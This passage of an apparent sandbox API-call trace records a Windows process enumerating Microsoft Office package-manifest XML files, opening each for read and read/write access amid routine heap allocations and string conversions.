hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89558 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89558 | out: hHeap=0x20000) returned 1 [0098.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.792] AreFileApisANSI () returned 1 [0098.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0098.793] AreFileApisANSI () returned 1 [0098.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 105 [0098.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.793] GetFileType (hFile=0x418) returned 0x1 [0098.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.794] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.794] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.794] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.794] CloseHandle (hObject=0x418) returned 1 [0098.794] AreFileApisANSI () returned 1 [0098.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.794] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.794] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 105 [0098.794] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.794] GetFileType (hFile=0x418) returned 0x1 [0098.794] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.795] CloseHandle (hObject=0x418) returned 1 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0098.796] AreFileApisANSI () returned 1 [0098.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 105 [0098.796] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84391d75, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xba5e3)) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.796] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP7BBA~1.XML")) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c458 [0098.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0098.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c458 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88d30 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88fe8 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88d30 | out: hHeap=0x20000) returned 1 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88fe8 | out: hHeap=0x20000) returned 1 [0098.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.797] AreFileApisANSI () returned 1 [0098.797] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.797] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.798] AreFileApisANSI () returned 1 [0098.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 105 [0098.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.798] GetFileType (hFile=0x418) returned 0x1 [0098.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.798] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.798] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.799] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.799] CloseHandle (hObject=0x418) returned 1 [0098.799] AreFileApisANSI () returned 1 [0098.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 105 [0098.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.799] GetFileType (hFile=0x418) returned 0x1 [0098.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.799] CloseHandle (hObject=0x418) returned 1 [0098.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.801] AreFileApisANSI () returned 1 [0098.801] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.801] 